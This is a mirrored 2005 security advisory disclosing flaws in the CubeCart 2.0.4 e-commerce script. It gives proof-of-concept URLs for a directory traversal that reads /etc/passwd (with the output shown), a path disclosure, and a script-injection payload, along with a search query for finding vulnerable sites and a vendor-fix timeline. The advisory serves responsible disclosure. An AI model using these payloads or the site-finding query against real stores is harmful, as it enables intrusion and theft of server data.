Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CubeCart204.txt

🗓️ 25 Feb 2005 00:00:00Reported by John CobbType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Remote vulnerabilities found in CubeCart 2.0.4 affecting over 150,000 websites.

Code
`Hello All,  
  
I have discovered a number of remote vulnerabilities in: CubeCart 2.0.4.  
  
Authors Site: http://www.cubecart.com  
  
CubeCart is described by its authors as:  
  
'What is CubeCart?  
CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you  
can setup a powerful online store as long as you have hosting supporting PHP  
and one MySQL database.'  
  
A quick check on Google reveals there are a possible 150,000+ websites  
possibly vulnerable:  
  
http://www.google.co.uk/search?hl=en&safe=off&q=%22%28powered+by+CubeCart%29  
%22&btnG=Search&meta=  
  
+-[Examples:]--------------------------------------------------+  
  
[1]------------------------------------------------------------+  
  
Directory Traversal:  
  
http://www.victimsite.com/index.php?&language=../../../../../../../../etc/pa  
sswd   
  
Result:  
  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP  
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin  
rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory  
owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service  
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS  
User:/var/lib/nfs:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
pcap:x:77:77::/var/arpwatch:/sbin/nologin  
apache:x:48:48:Apache:/var/www:/sbin/nologin  
squid:x:23:23::/var/spool/squid:/sbin/nologin  
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin xfs:x:43:43:X  
Font Server:/etc/X11/fs:/sbin/nologin  
named:x:25:25:Named:/var/named:/sbin/nologin  
ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash  
johnc:x:500:500:johnc:/home/johnc:/bin/bash   
Warning: Cannot add header information - headers already sent by (output  
started at /etc/passwd:11) in  
/var/www/virtual/www.victimsite.com/html/shoppingcart.php on line 44   
  
[2]------------------------------------------------------------+  
  
Path Disclosure:  
  
http://www.victimsite.com/index.php?&language=w00t  
  
Result:  
  
Warning: Failed opening  
'/var/www/virtual/www.victimsite.com/html/admin/lang/w00t' for inclusion  
(include_path='.:/usr/share/pear') in  
/var/www/virtual/www.victimsite.com/html/admin/settings.inc.php on line 134  
  
Warning: Cannot add header information - headers already sent by (output  
started at  
/var/www/virtual/www.victimsite.com/html/admin/settings.inc.php:134) in  
/var/www/virtual/www.victimsite.com/html/shoppingcart.php on line 44   
  
[3]------------------------------------------------------------+  
  
XSS:  
  
http://www.victimsite.com/index.php?&language=<script>var%20test_variable=31  
337;alert(test_variable);</script>  
  
Result:  
  
A nice pop up box.  
  
+-[Notes:]-----------------------------------------------------+  
  
Vulnerabilities found on: 09/02/2005  
Author(s) Informed on: 11/02/2005  
Author(s) Response: 13/02/2005  
Author(s) Fix: 14/02/2005  
  
  
Regards  
  
John Cobb  
  
[email protected]  
  
http://www.NoBytes.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
remote vulnerabilitiescubecartonline storedirectory traversalecommerce scriptphpmysql
19